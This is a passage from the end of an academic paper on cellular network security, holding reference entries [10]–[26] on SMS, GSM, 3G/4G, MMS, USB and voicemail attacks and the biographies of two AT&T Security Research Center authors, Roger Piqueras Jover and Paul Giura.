[10] P. Traynor, W. Enck, P. McDaniel, and T. La Porta, Exploiting open functionality in SMS-capable cellular networks, In J. Comput. Secur., vol. 16, Amsterdam, The Netherlands: IOS Press, December 2008, pp. 713-742.
[11] P. Lee, T. Bu, and T. Woo, On the detection of signaling DoS attacks on 3G wireless networks, In INFOCOM 2007: 26th IEEE International Conference on Computer Communications, IEEE, May 2007, pp. 1289-1297.
[12] Grugq, Base jumping: Attacking the GSM baseband and Base Station, In BlackHat Abu Dhabi, 2011, http://tinyurl.com/7laga5r.
[13] D. Spaar, A practical DoS attack to the GSM network, In DeepSec 2009, http://tinyurl.com/7vtdoj5.
[14] D. Talbot, One Simple Trick Could Disable a City's 4G Phone Network, MIT Technology Review, November 2012, http://www.technologyreview.com/news/507381/one-simple-trick-could-disable-a-citys-4g-phone-network/.
[15] 3rd Generation Partnership Project, Mobile radio interface layer 3 specification, 3GPP TS 04.08, v7.21.0, 2004.
[16] D. Foo Kune, J. Koelndorfer, N. Hopper, and Y. Kim, Location leaks over the GSM air interface, In 19th Annual Network and Distributed System Security Symposium, ser. NDSS '12, 2012.
[17] D. Bailey and N. DePetrillo, The Carmen Sandiego Project, In BlackHat USA, 2010, http://tinyurl.com/85mtblw.
[18] E. Gadaix, GSM and 3G security, In BlackHat Asia, 2001, http://tinyurl.com/85plhlv.
[19] U. Meyer and S. Wetzel, A man-in-the-middle attack on UMTS, In Proceedings of the 3rd ACM Workshop on Wireless Security, ser. WiSe '04, New York, NY, USA: ACM, 2004, pp. 90-97.
[20] D. Perez and J. Pico, A practical attack against GPRS/EDGE/UMTS/HSPA mobile data communications, In BlackHat DC, 2011, http://tinyurl.com/7wuf3er.
[21] Open Mobile Alliance, WAP Architecture, http://www.openmobilealliance.org.
[22] R. Racic, D. Ma, and H. Chen, Exploiting MMS vulnerabilities to stealthily exhaust mobile phone's battery, In Proceedings of the Second IEEE Communications Society / CreateNet International Conference on Security and Privacy in Communication Networks, 2006.
[23] Boston-WCBTV, Websites show how to spoof caller ID; voicemail hacking: easier than you think?, July 2011, http://www.thebostonchannel.com/r/28674908/detail.html.
[24] N. Davies and A. Hill, Missing Milly Dowler's voicemail was hacked by News of the World, In The Guardian UK, July 2011, http://tinyurl.com/6c6jgmw.
[25] D. V. Pham, A. Syed, and M. N. Halgamuge, Universal serial bus based software attacks and protection solutions, Digital Investigation, vol. 7, no. 3-4, pp. 172-184, 2011.
[26] Z. Wang and A. Stavrou, Exploiting smart-phone USB connectivity for fun and profit, In Proceedings of the 26th Annual Computer Security Applications Conference, ser. ACSAC '10, New York, NY, USA: ACM, 2010, pp. 357-366.

Authors' information

AT&T Security Research Center, New York, NY 10007.

Roger Piqueras Jover graduated from the Escola Tècnica Superior d'Enginyeria de Telecomunicacions de Barcelona (ETSETB) in 2006 with the degree of Telecommunications Engineer. That same year he was awarded a Balsells Fellowship to pursue graduate studies in Electrical Engineering at the University of California, Irvine, where he graduated in 2008 with an MSc in Electrical and Computer Engineering. In 2010 he graduated with an MPhil/MSc in Electrical Engineering from Columbia University. He is a Member of Technical Staff at the AT&T Security Research Center. His research interests are in the area of mobile and wireless communications, radio resource allocation, new network architectures and security for wireless networks. Mr. Piqueras Jover is a professional member of the IEEE and its Communications Society, and of the Association for Computing Machinery and SIGCOMM.

Paul Giura received his Ph.D. and Master's in Computer Science from the Department of Computer Science and Engineering at Polytechnic Institute of New York University in 2010 and 2007 respectively, and a Bachelor's in Computer Science from the University of Bucharest, Romania, in 2004. He is a Senior Member of Technical Staff at the AT&T Security Research Center in New York City. His research interests are in the areas of network and device security, advanced persistent threat detection and mitigation, forensics, big data for security, systems and databases. Dr. Giura is a professional member of the IEEE and its Computer Society, an active contributor to the Cloud Security Alliance mission, and serves on several technical program committees and editorial boards for leading security conferences and journals.